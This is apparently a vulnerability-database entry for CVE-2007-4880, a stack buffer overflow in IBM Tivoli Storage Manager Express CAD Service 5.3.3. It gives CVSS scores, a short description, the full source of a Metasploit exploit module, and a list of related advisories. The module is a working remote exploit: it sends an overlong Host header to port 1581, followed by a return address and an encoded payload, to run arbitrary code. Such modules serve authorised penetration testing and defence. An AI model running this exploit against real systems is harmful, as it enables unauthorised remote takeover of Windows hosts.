Lucene search
HistoryDec 19, 2009 - 1:09 a.m.
IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
CVSS2
10
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service (5.3.3). By sending an overly long GET request, it may be possible for an attacker to execute arbitrary code.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'IBM Tivoli Storage Manager Express CAD Service Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service (5.3.3).
By sending an overly long GET request, it may be possible for an attacker to execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2007-4880' ],
[ 'OSVDB', '38161' ],
[ 'BID', '25743' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 650,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'IBM Tivoli Storage Manager Express 5.3.3', { 'Ret' => 0x0289fbe3 } ], # dbghelp.dll
],
'DefaultTarget' => 0,
'DisclosureDate' => '2007-09-24'))
register_options( [ Opt::RPORT(1581) ])
end
def exploit
connect
sploit = "GET /BACLIENT HTTP/1.1\r\n"
sploit << "Host: 127.0.0.1 " + rand_text_alpha_upper(190)
sploit << [target.ret].pack('V') + payload.encoded
print_status("Trying target %s..." % target.name)
sock.put(sploit + "\r\n\r\n")
handler
disconnect
end
end
Related
canvas
canvas
Immunity Canvas: TIVOLI_STORAGE
2007-09-28 00:17:00
packetstorm
packetstorm
IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
2009-11-26 00:00:00
IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
2009-12-31 00:00:00
saint
saint
Tivoli Storage Manager CAD Host header buffer overflow
2007-10-26 00:00:00
Tivoli Storage Manager CAD Host header buffer overflow
2007-10-26 00:00:00
Tivoli Storage Manager CAD Host header buffer overflow
2007-10-26 00:00:00
cve
cve
CVE-2007-4880
2007-09-28 00:17:00
CVE-2007-5021
2007-09-21 18:17:00
cvelist
cvelist
CVE-2007-4880
2007-09-28 00:00:00
exploitdb
exploitdb
securityvulns
securityvulns
Tivoli Storage Manager backup client buffer overflow
2009-09-25 00:00:00
prion
prion
Buffer overflow
2007-09-28 00:17:00
Design/Logic Flaw
2007-09-21 18:17:00
nvd
nvd
CVE-2007-4880
2007-09-28 00:17:00
CVE-2007-5021
2007-09-21 18:17:00
checkpoint_advisories
checkpoint_advisories
zdi
zdi
IBM Tivoli Storage Manager Express CAD Service Buffer Overflow Vulnerability
2007-09-24 00:00:00
nessus
nessus
IBM Tivoli Storage Manager Client Multiple Vulnerabilities (swg21268775)
2007-09-25 00:00:00
CVSS2
10
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
Related for MSF:EXPLOIT-WINDOWS-HTTP-IBM_TSM_CAD_HEADER-